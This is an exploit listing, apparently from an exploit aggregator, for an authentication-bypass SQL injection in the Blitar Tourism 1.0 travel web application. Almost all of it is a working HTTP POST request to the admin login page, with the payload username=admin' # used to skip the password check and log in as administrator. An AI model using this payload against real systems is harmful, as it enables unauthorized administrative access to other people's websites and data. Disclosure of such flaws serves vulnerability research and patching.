Exploit for Blitar Tourism 1.0 SQL Injection

Name: Exploit for Blitar Tourism 1.0 SQL Injection
Rating: 5 (412 reviews)

2021-04-13 | CVSS 0.1

## https://sploitus.com/exploit?id=PACKETSTORM:162155
# Exploit Title: Blitar Tourism 1.0 - Authentication Bypass SQLi  
# Date: 13 April 2021  
# Exploit Author: sigeri94  
# Vendor Homepage: https://sourcecodeaplikasi.info/source-code-aplikasi-biro-travel-berbasis-web/  
# Software Link: https://codeload.github.com/satndy/Aplikasi-Biro-Travel/zip/master  
# Version: 1.0  
  
POST /travel/Admin/ HTTP/1.1  
Host: 192.168.186.132  
Content-Length: 49  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://192.168.186.132  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://192.168.186.132/travel/Admin/  
Accept-Encoding: gzip, deflate  
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: PHPSESSID=0nr18qfifjk2f5o4kimk5ca312  
Connection: close  
  
username=admin%27+%23&password=admin&Login=Log+in